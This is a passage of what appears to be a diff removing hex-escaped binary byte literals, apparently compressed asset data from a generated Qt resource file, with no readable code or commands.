-\x4c\x2a\xee\xd2\x61\x32\x5b\xf4\x7d\x57\x00\x33\x87\x66\x91\x0e\ -\x08\xc1\x2b\xbd\x12\xbb\xd3\x28\xfc\x51\x02\x0e\x4c\xb4\x53\x8b\ -\xef\xae\x84\xd6\x02\x3f\x48\xee\x4c\xc0\xa4\xb0\x16\x36\x8d\x5a\ -\x6e\xde\x95\xed\xe4\xdf\x25\xeb\x06\x76\xd6\x02\xb6\x55\xd2\xf1\ -\x02\xbc\x32\x28\x8f\x97\x0a\x99\xcc\xf0\xd0\x44\x3c\x80\xa8\x4d\ -\x4d\xba\xbc\xb2\x50\xc5\x49\xfa\x90\x0f\x0b\x8c\x15\xa2\xf8\x04\ -\x9f\x64\x2f\xbd\xbe\x7b\xa3\xe3\x73\x01\x87\x0d\x0b\xec\xbb\xc9\ -\x30\x31\x9a\xbd\xbd\xff\xab\x51\x50\x96\xfd\xe3\xed\x54\xb6\x05\ -\x1d\x0f\xdc\x22\x7b\x85\x4c\x26\x0c\xe8\xab\x02\x58\xa9\xfc\x93\ -\xec\x77\x3c\xee\x4c\x63\xdc\x97\x14\x71\xec\x5f\xcb\xd8\xd1\x51\ -\x5d\xc2\x68\x38\x15\x40\xc1\x85\xdb\x66\x0c\x4e\x16\xb5\xee\x55\ -\xb0\xc0\xf6\x6a\xc0\xd6\x4a\x90\xf8\x3b\x23\x04\x14\x2a\x54\xa4\ -\xe2\x95\x3a\xa4\xef\xa5\x72\x7d\xf7\x00\x84\x04\x21\x78\xae\x57\ -\x62\x3a\x69\xf7\xbf\x1b\xfb\xef\xce\xd0\x41\x11\x17\xdc\x1b\xe2\ -\xf8\x7f\xd8\x14\x80\xb1\xb0\x75\xca\xb2\x7b\xfb\xe0\x59\xff\x2e\ -\x9e\xb4\xdc\x3c\xea\xe3\xa5\x90\x0b\x70\x8b\xa0\x5c\x9e\x2b\x24\ -\xdb\xa0\xbf\x5e\x40\xdf\x15\x80\x0e\x28\x49\x87\x97\xba\xa5\xe4\ -\x3b\x0f\x05\x71\x81\x47\xd6\x0e\x8e\x5c\x4d\x3b\x48\xf6\x50\xd0\ -\x24\x10\xc0\x2d\x09\x8f\xfd\xea\x35\x16\xd8\x5a\x0d\x99\x2c\x45\ -\x89\x17\x69\xa9\x38\x0c\xd8\x27\x24\xcf\xee\xf7\xb5\xfa\xa6\x00\ -\x56\xed\xfd\xef\x74\x3c\x9e\x9d\xb4\xfb\x1f\x67\x74\x35\xbb\x32\ -\x1a\xfb\x77\x09\x02\x56\x86\x6c\x0c\x03\xd6\x42\xb5\x6c\xb9\x65\ -\x26\xfb\x7b\xff\x57\xa3\xa8\x0c\xbb\x47\x7c\x54\xc2\xdb\xd6\x42\ -\x80\x57\xa2\x2c\x25\x5f\xa7\x43\xfa\xda\x3f\x99\x44\x08\xf0\x1c\ -\xa7\xc8\xce\x34\xb2\xff\x3b\x6b\x01\x13\x3d\x3c\xc1\xb7\x1f\x04\ -\x11\x89\x76\x02\xf6\x1b\x6b\x61\x67\x67\xec\xd7\xa0\x7f\x2c\x01\ -\xec\xa8\x06\x54\x53\xe8\x18\x75\x4b\xa0\x5c\x9e\x27\x24\x9b\xfa\ -\x79\x9d\xbe\x2a\x80\x85\xa7\x10\x52\xf2\x1c\xaf\x48\x31\x69\x0b\ -\x57\x54\x96\x3d\x23\x01\x2a\xe3\x66\xa8\xd5\x16\x89\x9e\x0a\xdc\ -\x6f\x94\x8a\x93\x7f\xa5\x0c\x1c\xed\x76\xa3\x74\xab\x47\x77\x54\ -\x93\xf7\x22\x95\x07\x4e\x81\xfd\x42\x70\x2b\xf4\x2f\x0f\xd0\x57\ -\x05\x30\x3a\xcd\x98\x74\xb8\xd3\x49\x78\x14\xbb\xb5\x30\x59\x0a\ -\x99\x2c\x65\xa7\xe6\x7f\xcd\x75\xd2\x39\x11\x28\xcb\x8b\xbc\x96\ -\xcf\x93\xa1\xb1\x5f\xbd\x42\x89\xd8\x93\xf4\x12\xde\x12\x94\x12\ -\xdc\x12\xe3\x42\xf2\xdc\x52\x1f\x3b\x67\xfb\x1b\x02\x08\x76\x39\ -\x1e\xfb\x92\x9e\xf7\x2f\x65\x3a\x0f\xed\x5a\xb1\xc4\x1e\xc0\x30\ -\x29\x80\xbd\x3b\x6d\x26\xc6\x7e\xf5\x92\xa9\x72\xc4\xa6\x62\xf2\ -\xc9\x40\xb7\x88\x94\x0e\x2f\x68\x2c\xd0\xb7\xfa\xd9\xbe\x28\x80\ -\x99\x43\xb3\xdd\xa3\xa0\x9e\xed\x14\xd8\x9c\xe4\xd0\xcf\x6e\xf2\ -\x2f\x0d\xb7\xed\x9a\xd7\x3a\x64\x9d\x80\x9e\x0b\xcf\xb8\x59\x67\ -\x66\xec\x57\x2f\xe8\x9e\x2c\xb4\xbd\x1a\x24\x9e\xa8\x75\x3c\x70\ -\x5c\x0e\x20\x98\xee\xd7\x35\xfa\xe6\x01\xf8\x0d\xa4\x50\xdc\xe1\ -\x16\x49\xbc\xf3\x7f\x73\x39\xa4\xe6\x65\xdf\x0d\x35\x16\x9a\xed\ 
-\xe1\xe8\x04\xec\x8e\xfd\xda\x9b\xc1\xb1\x5f\x37\x8a\x00\xb6\x56\ -\x42\x4a\x09\xcf\x90\x90\x0e\x28\x8f\x5d\x42\x70\xb0\x6f\xd7\xe8\ -\xd7\x0f\x56\x1e\x35\xe9\x70\x47\xd2\xf1\xbf\x12\xf1\xc3\xca\x52\ -\xcb\xef\xe5\x88\x22\x56\x8e\xd3\x1a\x06\x0e\x66\x74\xec\xd7\x8d\ -\xd2\x2d\x27\x9f\x28\x26\x5b\xb1\x25\x04\xb8\x45\xaa\x42\xc6\x72\ -\xd4\x8f\x44\x60\xdf\x14\x80\x10\x4c\x2b\x87\x5d\x49\x9e\xf8\x63\ -\x81\xb2\x63\x98\x2a\x65\xbf\xb4\x4e\x00\x61\x24\xf0\x87\xa0\x13\ -\xd0\x12\x1f\x36\x7a\x6b\x46\xc7\x7e\xf5\x82\x82\xb2\x6c\x29\x87\ -\x89\x3f\x2a\xa7\x80\x90\x0e\x77\xb4\x97\xfa\xe3\x49\xf7\xe7\x79\ -\xc5\xb3\xe6\xf6\x3a\x1e\x9b\x45\x92\xf1\xa0\x85\xf1\x62\x94\xd9\ -\xba\xff\x8b\x89\x34\x04\xd1\xe0\x77\x02\x5a\x03\xdb\xa7\xb3\x3f\ -\xf6\xeb\x46\x10\xc0\xe6\x4a\x98\x78\x83\x90\x72\x41\x39\x1c\x90\ -\xaa\x3f\xf5\x00\x3d\x57\x00\x33\x87\x66\x51\x0a\x84\xe4\xa0\xe3\ -\x51\x4d\x32\x71\x22\x44\x1c\xff\xa7\xd1\xcb\x7d\x3d\x68\x13\x2b\ -\x81\x41\x67\x50\xc6\x7e\xdd\x28\xe3\x05\x9d\x78\x59\xb9\x8a\xf3\ -\x00\xdb\x11\xfd\xe9\x0b\xe8\x8b\x07\xd0\xae\xe3\x48\xc5\xad\xaa\ -\x90\xac\x47\xe8\x4a\xcb\x64\x29\x1a\x18\x8b\xaa\x75\xb2\x47\x82\ -\xf5\x83\x41\x1a\xfb\x75\x43\x9f\x13\x28\x3a\x86\xe9\x72\x82\xe7\ -\xb8\x13\x37\xd3\x29\x97\x51\x21\xd9\xdb\x0f\x63\xda\x17\x01\x95\ -\x8a\x8a\x74\x98\x49\x72\xee\xbf\x05\x2a\xae\x61\xac\x30\x18\x26\ -\x35\xce\x01\x0c\xbe\x07\xd0\x1d\xfb\xb5\x65\x40\xc6\x7e\xdd\x08\ -\x12\x98\x2c\x45\x89\x57\x97\x3a\x1e\x25\x29\x99\xe9\x47\x42\xbd\ -\x2f\x0a\x40\x08\x26\x94\xc3\x76\x95\x70\xfc\x3f\xe2\xe9\x54\x8e\ -\xf7\xbe\x5e\x82\x50\xa0\x13\x3a\x13\xb0\x5f\x38\x0e\xdc\x7e\xb3\ -\xc1\x1b\x90\xb1\x5f\x37\xca\xa6\x62\x94\xf8\x76\xa0\x72\x40\x28\ -\x6e\x6e\xcc\xf5\xbe\xa3\xb6\x3f\x0a\x40\xb2\x59\x3a\x4c\x26\x39\ -\xfc\x53\x88\x58\x3b\x3b\x03\x12\xff\x43\x3c\x0b\x40\x9b\xc1\x95\ -\x7f\x6b\x61\xd3\xd8\xe0\x8d\xfd\xba\x11\xca\xae\xa1\xe6\x26\xeb\ -\xb6\x49\x17\xa4\x62\x9b\x74\xe9\xf9\x3c\xed\x9e\x8b\x68\xe7\xb4\ -\x99\x6d\xca\x4d\x76\xfa\xaf\x12\x96\xf1\xe2\xe0\xc4\xff\xd0\x51\ -\x00\x03\x1c\x02\x58\x60\xff\x80\x8e\xfd\xba\xde\xcf\x5b\x90\x86\ -\xf1\x84\xeb\x01\xa4\x02\xa9\xd8\x21\x25\x63\x3d\xff\xd9\xbd\xfc\ -\x61\x33\x87\x66\x51\x1e\x20\xd9\x23\x9d\xe4\x8e\x38\x8a\x13\x34\ -\x96\x51\x6f\xb0\xa4\xc9\x0f\x44\x62\x67\x02\xf6\x83\x82\x1b\x67\ -\xff\xb3\xde\x71\xd9\x4b\xa4\x80\xb1\x82\x4e\xf4\xec\x00\x29\x41\ -\x39\x8c\x21\x98\x80\xde\xee\x04\xf4\xdc\x46\x9f\xfc\x32\x42\x4a\ -\xb6\x2b\x37\x59\x63\x5c\x76\x0c\x25\x67\xb0\xd2\x50\x7e\x98\xfc\ -\x2c\x80\x6e\x43\x8b\xeb\x72\x43\x2f\x71\x3c\xf6\xcb\xb0\x7b\xdb\ -\xc6\xb0\xfe\xab\x19\x2d\xe8\x44\x2b\x4d\x85\x00\xe9\x30\x2a\x24\ -\x53\xbd\xfe\xd9\x3d\x4f\x2a\x8c\xdf\x44\x51\x48\x76\x25\xd9\x00\ -\x84\x8d\x1b\x80\xbc\x14\xcf\x79\xbf\x1e\xfc\x20\x16\xc8\x24\x0e\ -\xe8\xb4\x16\x5c\x15\xc7\xec\x07\xf7\x18\xaa\x65\xcb\xc7\x3e\xe3\ -\xd0\xf2\xaf\x2f\x07\x21\x80\x83\x7b\xec\x40\x8f\xfd\xba\x5e\x2a\ -\x8e\xa1\xa0\x0c\x81\x51\xc9\x58\x39\x01\x52\x51\x80\xd8\x03\xe8\ -\x25\x3d\x57\x00\x02\x4a\xd2\x61\x2a\xd1\x1d\x00\x11\x0f\x6e\x50\ -\x03\x50\xff\xdf\xc5\x00\x2d\xbf\xbf\xaf\x4f\xd7\xda\x97\x4b\xb0\ -\x6b\x8b\xe1\x19\xfb\x0c\x07\xf6\x18\xa6\xc7\x2d\x87\x8f\x48\xcc\ -\x75\x26\x20\xe3\xb1\x5f\xb1\xfb\x2f\x18\xee\xe2\x9f\xb5\x28\x3a\ -\x86\xa2\x63\x59\x4e\xb0\x24\x40\x2a\x5c\x29\xe3\xce\x5a\xdd\xc3\ -\x14\x44\xef\x15\x80\xa4\x26\x25\x53\x49\x96\x00\x4b\x01\x35\x6f\ -\xb0\x5e\x46\x63\xa1\xd5\x8e\xd7\xdb\x4b\x35\xd0\xb5\xf6\x8e\x82\ -\xc9\xb1\x78\x38\xc7\xed\xfb\x0c\xbb\xb6\x1a\x2a\x9d\xac\x8c\x00\ -\x5a\x9d\x59\x84\xd7\x75\x0d\x0b\xbb\xb6\x1a\xb6\x4d\x0d\xfe\xd8\ 
-\xaf\x6b\xfe\xec\xc4\x05\x67\x15\xc7\x70\xa6\xd7\x0f\xef\x0a\x48\ -\x85\x14\x92\xe9\x5f\x7b\x35\xfc\xc4\x3d\xbd\xfb\xb9\xbd\xdf\xbd\ -\x15\x54\xa5\x43\x25\xc9\x12\x60\x47\x58\xaa\x09\x6f\xcd\xdc\x28\ -\xc6\x74\x3c\x80\x1e\xbd\x44\x5d\x6b\x5f\x2c\xc0\xce\x2d\x86\x3b\ -\xf6\x1b\x6e\xd9\x6b\x98\x1c\xb3\x38\xb2\xa3\x18\x56\x7d\x7f\xb3\ -\x25\xae\x3b\xff\xd0\x1d\xfb\x55\xf4\x06\x47\xe1\xf6\x12\x25\x2d\ -\x25\x37\xc1\xfd\xdb\x38\x07\x80\x90\x6c\xfa\xe1\xdf\x47\x56\x27\ -\x7b\xa7\x77\x7b\xa6\x00\x56\x0e\x01\x11\x8c\x0a\x49\x25\xa9\x9b\ -\x63\x01\x47\x5a\xca\xee\x60\xd9\xa2\xf8\x54\xe0\x1b\xff\xec\xd6\ -\x82\x23\x61\xbc\xb3\x1f\x7f\xc7\x7e\xc3\x9e\xed\x86\x6a\xe9\xfc\ -\xf7\x98\x35\xfe\x5d\xbd\x75\x7d\xa3\xc8\xac\x85\x89\x51\xcb\xfe\ -\xdd\x83\x75\xbf\x7b\x89\x00\x2a\x8e\x4e\x2e\xcb\xdd\xcd\x13\x09\ -\xc6\xbd\x0a\x0e\xd0\xb3\xe3\x64\xfb\xe3\x01\x48\xbc\x24\x3d\x80\ -\x82\xb2\xa9\x1c\xe0\x70\x23\x58\x0b\xc1\x75\xc6\x90\x17\xc7\xf6\ -\xb7\xdd\x6c\x38\xb0\xdb\x30\x35\x6e\x71\xd5\xa5\xd6\x7e\xad\x7f\ -\xdf\x1d\x45\x76\xad\xcf\xc9\x5a\xd8\xbb\xc3\x30\x39\xbe\xf1\x92\ -\x7f\x5d\x04\xe0\x29\x9b\x68\xc8\x29\x14\x48\xc9\x88\x94\x78\x64\ -\x55\x01\x74\x5e\xa6\x11\xa1\xfa\x7f\xa4\xd1\x0a\x16\x0a\xca\x0c\ -\xd4\x0e\x80\x20\x8e\xbf\x83\x70\xfd\x65\xc0\xd6\x76\xbc\x9d\x4e\ -\x6c\x7f\x70\x4f\x27\xb6\xdf\x12\x77\xe1\x75\x6e\xc5\xba\x7c\x43\ -\xcb\xf9\x51\x64\xd7\xaa\xa7\x3d\x17\x6e\xdf\x67\x70\xe5\xfa\xae\ -\x35\xac\x94\x1c\x83\x14\x16\x6d\x93\xb1\x74\x42\xc4\xf9\x35\x21\ -\x29\x00\xf5\x5e\xfd\xdc\xde\x7a\x00\xb1\x4a\x2c\x0a\x91\x7c\x17\ -\xe0\x20\xed\x00\x40\x2c\xfc\x7e\x78\x75\x01\xec\x5a\xfb\x4a\xd9\ -\xb2\x7b\x9b\xe5\xf6\x7d\x86\x03\x37\x19\x36\x8d\x5a\x94\xbc\xba\ -\xb5\x5f\x0b\xa3\xa1\x7d\x1d\xf9\x07\xd3\x1d\xfb\x35\xc0\x47\x7e\ -\xf5\x8a\x82\xb2\x48\x01\x3a\xa1\x1b\xd1\xa9\xb0\x2d\x41\x6f\x8d\ -\x6b\x4f\x15\x80\x54\x60\x2c\x55\x21\xfb\x7b\x9a\xc9\xc5\xb8\xca\ -\x0e\xdc\xc9\x3a\x7e\x10\x9f\x0a\xb4\x16\x5d\x6b\xef\xaa\x58\xe0\ -\x6e\xd9\x6b\xb8\xfd\x66\xc3\xce\x2d\x71\xe2\x0d\xd6\x6f\xed\x2f\ -\xa6\xdb\x85\xd8\x6c\x73\x5d\x49\xac\x83\x7b\x86\x73\xec\xd7\xb5\ -\xe2\x4a\x8b\x92\x96\xd0\x24\xf4\xe2\xc5\x0a\xa0\x8c\xa0\xa7\x3d\ -\x81\xbd\x0d\x01\x24\x20\x70\x45\x92\x43\x6e\x44\xfc\x30\xc4\x00\ -\xbd\x92\x02\x68\x07\xf1\x48\xb0\xd5\x74\xad\x7d\xb5\x1c\x1f\xac\ -\x79\xc7\x7e\xc3\xfe\x9b\x0c\xe3\x23\x16\x25\x62\x81\xef\xc5\xa7\ -\x0c\x22\x41\xdb\xbf\xf6\x87\x54\x2e\xc4\x7b\xff\x92\x8d\xed\xfe\ -\x43\x9c\x78\x96\xf4\x7e\x1b\xf7\x72\x08\x01\x48\x5c\x41\x6f\x8d\ -\x6b\x6f\x3d\x80\x38\x2e\x74\x49\x78\xca\x95\x12\x83\xe7\x01\x68\ -\x2d\x56\x1a\x81\x8c\x89\xdb\x6a\x37\x4f\x58\x6e\x9d\x89\x63\xfb\ -\x1d\x9b\x0d\x45\xf7\xbc\x8b\xdf\x4b\x81\x8b\xa2\xb8\x0c\xf9\x5a\ -\x30\x06\xb6\x6f\x1e\xee\xb1\x5f\xd7\x82\x12\x16\x99\x70\xd8\x29\ -\x62\xf7\xbf\xa7\xb3\x01\x7b\xeb\x01\x28\x40\x24\xdf\x1b\x92\xf4\ -\xe1\x8d\xbd\xc0\x98\xce\xd1\x53\x95\x38\xb6\xbf\xe3\x40\xc7\xda\ -\xd7\xe2\xd8\xd2\xd0\x3f\x2b\x1b\x46\x10\x5e\xa3\x02\x90\x32\xde\ -\xfb\x1f\xf6\xb1\x5f\xeb\x45\x88\x1b\xeb\xa5\xb8\xf6\x0b\x82\x90\ -\x08\x7a\x9c\x5f\xeb\xa9\x02\x28\x54\x20\x6c\xe1\x24\xed\x01\x08\ -\x06\xab\xa7\xde\x12\x2b\xad\x57\xbc\x20\xe2\xe0\x1e\xc3\xd6\x49\ -\x4b\xa1\x4f\xd6\xfe\x62\x04\x71\x01\x52\x78\x0d\xe5\xa4\xd6\xc2\ -\x68\xd5\x72\x60\xcf\x60\x55\x5b\xf6\x13\x29\x52\x39\xd1\x59\xd1\ -\x63\x99\xed\xe9\x0f\xeb\xc4\xb0\x89\xdf\x96\x41\x8a\xff\x21\x16\ -\xa0\x1d\x5b\x0c\xbb\xb7\xb3\x12\xdb\x27\x19\x53\x37\xdb\x10\x69\ -\xb1\xee\x17\xd8\x5a\xd8\xb3\x63\x63\x8c\xfd\x5a\x3f\x36\xf9\x11\ -\xe8\xa2\xf7\xb6\xae\xa7\x9f\xc1\xc4\x31\x6d\xe2\xd2\x38\x88\xe3\ 
-\x28\x5d\x27\xb6\x20\x69\x08\x54\xab\x2d\xae\x69\x10\x89\xe3\xc4\ -\xee\xff\x46\x19\xfb\xb5\x3e\x52\x31\x3b\x19\x57\x00\xb1\x5b\xa9\ -\x6d\xc2\xbb\x44\xdd\x6d\xb3\x9c\xf5\xd1\x1d\x45\xb6\x1e\x36\xe2\ -\xd8\xaf\xf5\x61\xd3\x31\x3b\x3d\xbe\x68\x4f\x15\x80\x8e\xfb\xdb\ -\x13\x3f\x93\x3b\xa9\x6a\xac\x61\x60\xa5\x0a\x70\x9d\xcf\xc8\xda\ -\x8d\x35\xf6\x6b\xbd\x58\x9b\xc2\x34\x27\x8b\xa1\xc7\x51\x58\x6f\ -\x15\x40\xec\x56\xb6\x6d\xc2\xa1\xa2\x36\xd7\xd7\xd8\xb2\x11\x31\ -\x40\xa3\xb5\xfe\x23\xc9\x8b\x85\xd8\xfd\xdf\x48\x63\xbf\xd6\xc3\ -\xf5\x54\x60\xde\xe8\x05\x3b\x72\xd5\xd3\xb6\xd7\x9e\x2a\x00\xab\ -\xc1\x5a\x7c\x92\x34\x16\x16\x42\x23\xd2\x72\xc8\x06\x0e\x63\xa0\ -\xd9\x5a\xe7\xf7\x5a\xd8\x3a\x69\xb9\x69\x03\x8e\xfd\xba\x1a\xc6\ -\xa6\xe2\x79\x46\x58\x7a\x3a\x86\xa4\xb7\x0a\x20\x2e\x55\x6b\x58\ -\xd3\x5b\x2d\x75\x35\x42\x33\xd8\xc3\x35\x93\xa4\x3b\x87\x60\x3d\ -\xb7\x4b\x00\x07\xf7\x9a\x0d\x39\xf6\xeb\x6a\xe8\x84\xdf\x39\x6b\ -\xc1\x1a\x42\x0b\x3d\x1d\x49\xdc\x5b\x05\x10\xff\xc7\x4f\x34\x04\ -\x10\xb1\x02\xd0\x66\xf0\x0f\xd9\xec\x37\xdd\x2e\xc4\xb6\x7f\xf5\ -\xef\x8d\xc7\x7e\xd9\x95\xb1\x5f\x39\x17\xe2\x6b\x99\xf8\x3b\x67\ -\x2d\x3e\x64\xd8\x03\xe8\xc4\x29\x4b\xc6\xf4\xae\x5f\x79\x3d\x04\ -\x5a\x10\xe5\x26\x6a\x5d\x84\xa1\xa0\x1d\x5c\xfd\xb5\x8d\xc7\x7e\ -\x59\xb6\x4e\x6e\xbc\xb1\x5f\xeb\xc1\xd7\x22\xb1\x4e\x40\x88\xbd\ -\x6b\x6b\x68\x60\x59\x67\x00\xb7\x3e\xfa\x51\xcb\xd0\xb0\x86\x20\ -\xc9\xa4\x5c\x64\x04\x51\x52\x5d\x59\x03\x4e\x10\xc5\x9d\x88\x57\ -\xbb\x5b\xdd\xb1\x5f\xa5\xbe\x9c\x4a\x3f\xf8\xb4\xb4\xc4\x24\x98\ -\x03\xb0\xb1\x71\x6d\xda\x1e\x1b\xd7\x9e\x2b\x00\x6b\xa9\x5b\x43\ -\x33\xa9\xa0\x51\x00\xa1\x91\xb4\xa2\x01\x6c\x08\x48\x18\x41\xdc\ -\x82\x7c\xb5\x51\x64\xd6\xc2\x58\x2d\x1e\xfb\x95\x3b\x56\x97\x62\ -\x81\x46\x28\x13\xbd\x37\xd6\x80\xd5\x9c\xb3\x36\xa3\x0a\xe0\xc8\ -\xdd\x6f\x8e\x17\x6a\xa9\x9b\x88\x66\xa2\x1e\x80\x85\x76\xae\x00\ -\xd6\x85\x1f\x5e\xda\x86\x7c\x31\xd6\xc2\xcc\xce\x8d\x3d\xf6\xeb\ -\x4a\x18\x0b\xf5\x40\x25\xba\xf5\xdc\x09\x01\xce\x45\x41\x96\x73\ -\x00\x00\x86\x86\xb5\x2c\xda\x04\x03\x47\x6d\x04\x8d\x5c\x01\xac\ -\x8b\xb6\x2f\x88\xf4\x95\x1b\x59\x3c\x17\x9e\xd1\x19\xfb\x95\x73\ -\x29\xa1\x91\x34\x42\x99\x68\xd7\x8b\x89\xc0\x5a\x4e\x9d\xf8\xbe\ -\x0c\xd7\x01\x00\x58\xf0\x8d\x66\x3e\xc9\x23\xaf\x62\x97\x4c\xe5\ -\xd6\x6a\x1d\xb4\xda\x57\x3e\x90\xd4\x5a\x98\x9e\xb0\xec\xc9\xc7\ -\x7e\xad\x89\x20\x4e\x00\x36\x13\x36\x38\x5a\xa3\x8d\xe1\xe4\x81\ -\xf7\xf7\xf6\xe7\xf6\xfc\x53\x98\x88\xb6\x35\x9c\xb2\x49\x56\x02\ -\x58\x58\x0a\x64\x5e\x12\xbc\x0e\x9a\xed\xab\x9f\x07\x90\x8f\xfd\ -\xba\x32\xcd\x50\xe2\x6b\x99\xe8\x16\xa0\x89\xf0\xad\xe1\xc9\x5e\ -\x9e\x0a\x04\x7d\x50\x00\xdb\x6f\x27\x34\x9a\x13\xbd\x5e\xe8\x15\ -\x11\xb1\x07\x10\xe8\xbc\x16\xe0\x4a\x58\x62\x0f\xe0\x72\x05\x2c\ -\x16\x28\x15\xcf\x8f\xfd\xca\x59\x9b\xe5\x50\x25\x37\x0b\x90\xd8\ -\x2b\xd3\x21\x4d\x2c\xa7\x7a\xfd\xb3\x7b\xfa\x9c\x8f\xdc\xfd\x66\ -\xe6\x9e\x00\x6b\x38\x61\xa2\x64\xab\x01\x1b\xa1\xa4\x19\xe6\xaf\ -\xed\x95\xb0\xc4\x1e\xc0\xe5\x92\x57\xd6\xc0\x8e\xcd\x86\x1d\x5b\ -\xf2\xec\xff\xe5\xb0\xc0\x42\x5b\x25\x5e\x03\x60\x22\xe6\xac\xc9\ -\xb8\x02\x80\x78\x26\x80\xb5\x9c\xd0\x11\xed\x64\x6e\x4f\x67\x7b\ -\x4b\x0b\x16\x83\x44\x87\x11\x0f\x1c\xc6\xc4\xc3\x40\x2e\xf7\xee\ -\x4a\x09\xb7\xee\x35\x94\x0b\x79\x7b\xf5\xe5\x88\x8c\xe0\x9c\xef\ -\x24\x7a\x83\x8c\x06\xa3\x39\x6b\x2d\xe7\xe0\xfc\x8e\x5b\x2f\xe8\ -\xbd\xc9\x8c\xdb\xa4\x4e\x99\x88\x46\x92\x3b\x01\x91\x15\xcc\xb5\ -\x9d\xfc\xc5\xbd\x02\xda\xc4\xc3\x40\xd6\xc2\xda\x78\x3e\x61\x77\ -\xec\x57\xce\xa5\x08\xa0\x19\x49\xce\xf9\x2a\xf1\x1d\x00\xa3\x39\ 
-\x6a\x74\xef\x0e\x04\xe9\xd2\x17\x9f\xd9\x1a\x4e\xe9\x90\x53\x49\ -\x2a\x00\x80\xb3\x2d\x07\x5f\xe7\xaf\xef\x5a\x08\xba\x8d\x40\x6b\ -\xff\x7d\x7c\xe4\x57\x3e\xf6\xeb\x6a\x2c\x07\x8a\x56\x94\x6c\x02\ -\x50\x87\x60\x34\x4f\x7c\xe3\x1b\x7a\x5f\x62\xdf\x1f\x05\x60\x39\ -\x67\x34\x27\x13\x4d\x04\x02\x8b\xbe\x43\x23\x54\xb9\x05\xbb\x0c\ -\x61\xe7\x3c\x80\xb5\x70\x1c\xb8\xed\xe6\x7c\xec\xd7\xd5\x38\xdb\ -\x72\x12\x4d\x00\x02\xe8\x80\xd0\x1a\x1e\xfa\xc8\x7b\x7b\xeb\xfe\ -\x43\x9f\x14\x80\x89\x68\x98\x88\x23\xba\xa7\x35\x4b\x57\x46\x00\ -\xad\x48\x30\xd7\xca\xdf\xe0\xcb\x11\x84\xac\x79\x1c\x99\xb5\xf1\ -\x79\x83\xf9\xd8\xaf\x2b\x13\x59\xc1\x7c\xdb\x49\xbc\x02\x30\x0a\ -\x58\xb2\x86\xc7\xfa\xe1\x51\xf7\x45\x01\x94\x46\x89\x8c\xe6\xe1\ -\x28\x48\x76\x27\x20\xb2\x82\xd3\x2d\x37\x9f\x0d\x70\x19\xba\x0a\ -\xe0\x62\x2c\xb0\xef\x26\xc3\xc4\x48\xbe\xf7\x7f\x39\x04\xf1\xfe\ -\xff\xd9\xb6\x93\x6c\xfc\xaf\x41\x87\x3c\x65\x0d\xc7\xfa\xf1\xf3\ -\x7b\xae\x00\x8e\xdc\xfd\x66\xa2\x10\xac\xe5\xb0\x0e\xa8\x27\x3d\ -\xaa\xeb\x74\xd3\xa1\x99\x70\x8c\x36\x08\x08\xc0\x0f\xc5\x9a\x07\ -\x82\x14\xbd\xd8\xfd\xcf\xc7\x7e\x5d\x99\xf9\xb6\x43\x23\x4c\x3e\ -\xfe\xd7\x11\x8f\x59\xcb\x5c\x3f\x7e\x7e\x7f\x36\xce\xe3\xe9\x25\ -\xc7\x22\x9f\xa7\x4d\x82\x79\x00\x01\x2c\x05\x8a\xf9\x76\x1e\x06\ -\xac\x85\x1f\xc4\xe7\x01\xac\x7e\x83\x57\xc6\x7e\x6d\xcd\xad\xff\ -\x95\x30\xc0\xc9\x86\x9b\x7c\xfc\x1f\x27\x00\x0f\x1f\x7d\x0f\xcd\ -\x7e\xfc\xfc\xbe\x55\xce\x58\xc3\x09\x1d\xf1\x50\x92\x79\x00\x80\ -\xc0\x08\x9e\x6a\x78\xf9\xcb\xbc\x06\xad\x36\x71\x23\xd0\xaa\x3f\ -\xcb\xc7\x7e\xad\x0f\x3f\x92\x9c\x4e\x21\xbf\x14\xb6\x09\x8c\xe6\ -\xf0\xcd\x6f\xe8\xcf\xcf\xef\x9b\x02\xf0\xeb\x34\x75\xc4\xe7\x43\ -\x3f\xf9\xf7\xea\xe9\x86\x4b\x33\x61\x57\x6d\x10\x68\xb4\x2e\xec\ -\x03\x38\x3f\xf6\x4b\xe7\xf7\xea\x0a\x08\x60\xae\xed\x70\xce\x77\ -\x92\xad\xff\xd7\x10\x05\xcc\x61\x79\xd0\xda\xde\xef\x00\x40\x1f\ -\x15\x40\x79\x1c\x6b\x0d\x9f\x8b\xda\xc9\xce\x06\x10\xc0\x39\x5f\ -\x71\x26\xdf\x0d\xb8\x80\x95\x3e\x80\x8b\x14\xc0\xae\xad\x96\x6d\ -\x53\xf9\xde\xff\x95\x30\xc0\x93\x75\x8f\x20\xe1\x1a\x13\x1d\x82\ -\x0e\x78\xd4\x5a\x8e\xf6\xeb\x1a\x7d\x51\x00\x2b\xc3\x41\x0c\x87\ -\x43\x9f\xe3\x49\xe6\x01\x20\x0e\x03\x9e\xac\x7b\x89\xd6\x6b\x0f\ -\x02\x2d\xff\xc2\x3e\x00\xa5\xe2\xe4\x5f\xd1\x4d\x7b\x65\xd9\x45\ -\x10\x0f\xff\x38\xbe\x9c\x7c\x58\x19\xf9\xa0\x23\xee\xd7\x21\x0b\ -\xfd\xba\x46\x7f\xbb\x67\x2c\x27\x75\xc8\x03\xd1\x3a\xa6\xd0\xf6\ -\x9a\x93\x0d\x8f\xe5\x20\x2f\x0a\xea\x62\xec\x85\x7d\x00\xd6\xc2\ -\xf8\x88\xe5\xc0\x4d\xf9\xde\xff\xd5\x78\xba\xe9\xb2\x1c\x24\x1f\ -\x52\x86\x6d\x7c\xa3\xf9\xac\x5b\xea\x9f\x83\xd6\x57\x05\xe0\x16\ -\x69\x9a\x88\x4f\x84\xed\x64\xeb\x01\xba\xbb\x01\x27\x1a\xf9\x44\ -\xcb\x2e\xda\x40\xb3\x25\x56\x34\x40\x77\xec\xd7\xa6\x7c\xec\xd7\ -\x15\x09\x8c\xe0\xe8\x52\x81\x28\xe1\x59\x13\x46\x43\xe4\x73\xd6\ -\x1a\xbe\x4c\x9f\xe2\x7f\xe8\xb3\x02\xd0\x11\x58\xc3\xbd\x41\x8b\ -\x39\x93\xa8\x0a\x00\x6d\xe1\x89\x25\x2f\xef\x0d\xe8\x10\xe9\x4e\ -\x1f\x40\xe7\x76\x78\x6e\xec\xfe\xe7\x63\xbf\x2e\x8f\x00\x4e\x37\ -\x5d\x9e\x6e\x24\x9b\xfc\x83\xd8\xfd\x8f\x02\x1e\xa0\x8f\xf1\x3f\ -\xf4\x3b\x04\x20\xce\x03\x44\x01\x0f\xe8\x44\x4f\x0a\xe8\x3c\xbc\ -\x96\xcb\xa9\xa6\xbb\xe1\xc3\x00\x01\x68\x7d\xfe\x3c\x80\xee\xd8\ 